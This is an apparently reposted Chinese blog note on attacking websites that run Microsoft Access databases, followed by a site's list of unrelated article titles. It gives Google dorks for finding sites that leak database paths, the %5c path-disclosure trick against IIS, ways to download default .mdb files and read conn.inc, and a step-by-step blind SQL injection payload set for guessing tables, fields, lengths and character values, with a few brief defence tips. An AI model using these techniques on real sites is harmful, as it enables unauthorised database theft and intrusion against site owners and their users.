使用Access数据库站点的渗透思路
来源:互联网 发布:linux alias 加参数 编辑:程序博客网 时间:2024/05/24 06:09
1、网站使用整套的开源代码,没有更改数据库的路径 就会产生默认数据库下载。
方法:怎样判断一个网站使用的开源版本:版权声明 源码中注释信息
防御:修改默认数据库的文件名和路径名 可以更改为特殊少见的名字 同时使用# 防止直接下载 (但是不可靠%23就可以解决了)或者改成asp后缀(但是可以使用迅雷等软件下载 然后重新命名即可 这样的数据库也可能被插入一句话木马 成为一句话的服务器危害更大)
2、对于数据库连接信息没有隐藏,导致数据库路径泄漏 即暴库
方法:直接使用google 关键词 (汽车、美容、旅游等等)server.mapPath(".mdb")就可以搜索出大量的可以报出数据库信息的网站,针对一个网站可能通过robots.txt 可能查出数据库路径,(应该下载搜索的范围 User-agent: * Allow: /data/*.htm 只允许访问.htm文件)当然这个robots.txt是个双刃剑 还可能报出很多有用信息 如果使用不当
%5c暴库:将url的最后一个/改成%5c即/ url不会转义,而IIS以/表示真实的目录关系,以/表示虚拟路径。当IIS获取某个目录时,如果碰到/符号,则将/符号之后的路径作为物理的绝对路径,而忽略/符号之前的路径信息,因此产生找不到指定文件的错误。 显示出网站数据库的路径信息。当然完整的数据库信息还要加上 %5c之前的路径 当然暴三级目录比暴二级目录成功概率高,因为二级目录可能是虚拟目录
conn.asp暴库:
<!--include file='conn.inc'--> 可以直接查看conn.inc文件 看到数据库连接信息
防御:将数据库连接信息,放到单独文件中如conn.asp 在使用文件中 直接进入<!-- include file="conn.asp" --> 避免在源码中看到连接数据库语句信息
处理异常信息
sql注入
判断注入点 ' / and 1>0 / and 1<0 主要后面就是真或者假的就可以
猜表: ?id=1 and exists(select * from 表名) 正常时有该表
猜字段: ?id=1 and (select count(字段) from 表名)>=0
猜长度: ?id=1 and (select top 1 len(字段) from 表名)>* 确定长度
猜内容: ?id=1 and (select top 1 asc(mid(字段,N,1)) from 表名)>* 确定asc码
Ascii 0-9 48-57
Ascii a-z 97-122
Ascii A-Z 65-90
?id=1 and (select top 1 mid(字段,N,1) from 表名) ='g' 直接获得字符内容 如果是汉字内容 可以读取第一汉字 若使用asc 则返回的是负值 则怎么猜解汉字 还没有解决??
p { margin-bottom: 0.21cm; }a:link { }
asc(): 取绝对值
mid:Mid(string,start[, length]):返回Variant(String),其中包含字符串中指定数量的字符。
cstr: 把其他类型的变量转换为字符串
枚举所有内容:
利用条件过滤:?id=1 and (select top 1 len(字段) from 表名 where 字段 not in ('查询结果1','查询结果2'))>*
利用排序操作:select top 1 字段1 from (select top N 字段1,id from 表名 order by id asc) T order by id desc
- 使用Access数据库站点的渗透思路
- [渗透测试]Access数据库破解
- 渗透测试的目标、思路
- 一些cms渗透的思路
- Dreamweaver链接Access数据库IIS配置站点的注意情况
- 渗透思路
- 渗透思路
- 内网渗透应用 跨vlan渗透的一种思路
- 使用简单的Access数据库
- IIS发布站点Access数据库不能写
- 使用JAVA访问ACCESS数据库的方法
- 使用access数据库需要注意的问题
- C# 使用access数据库的一些经验
- 使用VC连接Access数据库的方法
- 微软Access数据库使用的快捷键总结
- 使用c#操作ACCESS数据库的方法
- c#与Access数据库的使用
- 对台湾视频站点的再次渗透尝试
- .net连接access实现增删差该
- 上帝是位数学家
- .net异步编程
- VC 新手的错误!
- web 数学公式
- 使用Access数据库站点的渗透思路
- LuCI学习总结(一)
- 软件工程课程设计小结
- su root, incorrect password, 密码是正确的
- 目录
- 各大公司的笔试题下载
- [解题报告]《算法竞赛入门经典》基础题Volume 0. Getting Started Uva10055 Uva10071 Uva10300 Uva458 Uva494 Uva490 Uva445 Uva488 Uva489 Uva694 Uva457
- Qt embedded 建立
- File类补充------实现目录树状展示